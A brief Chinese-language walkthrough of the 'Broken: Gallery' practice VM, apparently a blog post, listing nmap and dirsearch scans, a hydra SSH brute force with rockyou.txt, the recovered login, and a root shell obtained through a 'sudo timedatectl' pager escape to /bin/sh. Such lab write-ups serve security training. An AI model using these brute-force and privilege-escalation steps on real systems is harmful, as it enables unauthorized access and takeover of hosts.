Broken: Gallery靶机复现

CcHKer2024-08-18 16:34

靶机设置

靶机设置为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.142

目录扫描

dirsearch 192.168.112.142

访问浏览器

发现文件页面

查看后发现都没什么用

getshell

hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh

尝试爆破ssh账号密码

爆破成功

账号:broken

密码:broken

远程连接

ssh broken@192.168.112.142

连接成功

提权

sudo -l查看免密操作

尝试sudo提权

sudo timedatectl list-timezones

!/bin/sh

提权成功

相关推荐
破坏的艺术18 小时前
DNS 加密协议对比:DoT、DoH、DoQ
网络·dns
feifeigo12318 小时前
MATLAB的无线传感器网络(WSN)算法仿真
网络·算法·matlab
爱吃汽的小橘20 小时前
异步串口通信和逻辑分析仪
运维·服务器·网络·单片机·嵌入式硬件·fpga开发
2503_924806851 天前
海外IP的适用业务范围
网络·网络协议·tcp/ip
Hello.Reader1 天前
Flink State V2 实战从同步到异步的跃迁
网络·windows·flink
mobai71 天前
华为NetEngine 8000 M1A路由器配置
网络·华为·智能路由器
-快乐的程序员-1 天前
simple websocket用法
网络·websocket·网络协议
想不明白的过度思考者1 天前
JavaEE初阶——中秋特辑:网络编程送祝福从 Socket 基础到 TCP/UDP 实战
网络·tcp/ip·udp·java-ee
nightunderblackcat1 天前
四大名著智能可视化推演平台
前端·网络·爬虫·python·状态模式
沐浴露z1 天前
【深入理解计算机网路07】详解局域网:以太网、VLAN与无线局域网
网络·网络协议·计算机网络·408
热门推荐
01两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答02GitHub 镜像站点03UV安装并设置国内源0446个Nano-banana 精选提示词,持续更新中05智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践06Cursor Plan Mode:AI 终于知道先想后做了07Linux下V2Ray安装配置指南08GitLab 零基础入门指南:从安装到项目管理全流程09一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示10BongoCat - 跨平台键盘猫动画工具